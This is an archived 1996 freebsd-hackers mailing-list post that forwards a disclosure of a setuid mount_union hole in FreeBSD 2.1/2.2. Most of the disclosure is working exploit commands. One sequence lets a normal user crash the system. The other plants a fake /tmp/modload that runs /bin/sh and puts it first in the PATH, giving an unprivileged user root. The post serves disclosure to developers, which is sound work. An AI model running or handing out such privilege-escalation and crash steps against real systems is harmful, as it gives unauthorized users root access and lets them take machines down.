Skip site navigation (1)Skip section navigation (2)
Date:      Fri, 17 May 1996 19:06:03 -0400 (EDT)
From:      Dan Polivy <danp@library.pride.net>
To:        freebsd-hackers@freebsd.org
Subject:   SECURITY BUG in FreeBSD (fwd)
Message-ID:  <Pine.BSF.3.91.960517190355.230C-100000@library.pride.net>

next in thread | raw e-mail | index | archive | help
I came across this in my travels...thought you guys may be interesting 
(in  case you didn't already know)...It's worked for me on my -RELEASE, 
and -STABLE machines...dunno about any others...

Dan

+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|         JRI HIS MIS Systems Administrator/Tech Support         |
|////////////////////////////////////////////////////////////////|
|    danp@busstop.org dpolivy@jri.org danp@library.pride.net     |
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|
|        Check out JRI's Homepage at http://www.jri.org          |
|////////////////////////////////////////////////////////////////|
| EMail health@jri.org or check out http://www.jri.org/jrihealth |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

---------------------------------
Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!

Hole found by Adam Kubicki

Best wishes
    Chris Labanowski

    KL
----------------------------------




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960517190355.230C-100000>